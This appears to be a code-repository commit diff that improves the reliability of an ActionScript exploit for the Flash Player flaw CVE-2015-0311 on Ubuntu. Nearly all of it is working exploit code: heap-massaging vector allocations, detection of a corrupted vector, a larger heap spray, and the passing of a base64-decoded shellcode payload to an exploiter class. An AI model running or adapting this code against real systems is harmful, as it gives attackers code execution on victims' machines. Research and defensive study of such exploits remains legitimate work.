Land #5417, Improve reliability for CVE-2015-0311 on Ubuntu
commit
b7f9d28976
Binary file not shown.
|
@ -26,15 +26,20 @@ package
|
|||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:String
|
||||
private var platform:String
|
||||
private var massage:Vector.<Object> = new Vector.<Object>(10000)
|
||||
|
||||
public function Exploit()
|
||||
{
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
payload = b64.toByteArray().toString();
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
|
||||
// defrag
|
||||
for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
|
||||
for (var i:uint = 0; i < massage.length / 2; i++) {
|
||||
massage[i] = new Vector.<uint>(0x3e0)
|
||||
}
|
||||
|
||||
for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
|
||||
ba.compress()
|
||||
|
@ -44,8 +49,10 @@ package
|
|||
try {
|
||||
ba.uncompress()
|
||||
} catch (e:Error) { }
|
||||
uv = new Vector.<uint>(0x3e0)
|
||||
uv[0] = 0
|
||||
|
||||
for (i = massage.length / 2; i < massage.length; i++) {
|
||||
massage[i] = new Vector.<uint>(0x3e0)
|
||||
}
|
||||
|
||||
var test:uint = li32(0)
|
||||
if (test == 0x3e0) {
|
||||
|
@ -54,6 +61,20 @@ package
|
|||
Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
|
||||
return // something failed
|
||||
}
|
||||
|
||||
|
||||
for (i = 0; i < massage.length; i++) {
|
||||
if (massage[i].length == 0x3e0) {
|
||||
massage[i] = null
|
||||
} else {
|
||||
Logger.log('[*] Exploit - corrupted vector found at ' + i)
|
||||
uv = massage[i]
|
||||
uv[0] = 0
|
||||
}
|
||||
}
|
||||
|
||||
if (uv.length != 0xffffffff)
|
||||
return
|
||||
|
||||
exploiter = new Exploiter(this, platform, payload, uv)
|
||||
}
|
||||
|
|
|
@ -23,7 +23,7 @@ package
|
|||
private var payload_address:uint
|
||||
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(51200)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(80000)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
|
||||
{
|
||||
|
|
|
@ -7,13 +7,10 @@ package
|
|||
|
||||
public static function alert(msg:String):void
|
||||
{
|
||||
if (DEBUG == 0)
|
||||
return
|
||||
|
||||
var str:String = "";
|
||||
str += msg;
|
||||
|
||||
trace(str);
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("alert", str);
|
||||
|
@ -22,13 +19,10 @@ package
|
|||
|
||||
public static function log(msg:String):void
|
||||
{
|
||||
if (DEBUG == 0)
|
||||
return
|
||||
|
||||
var str:String = "";
|
||||
str += msg;
|
||||
|
||||
trace(str);
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("console.log", str);
|
||||
|
|
Loading…
Reference in New Issue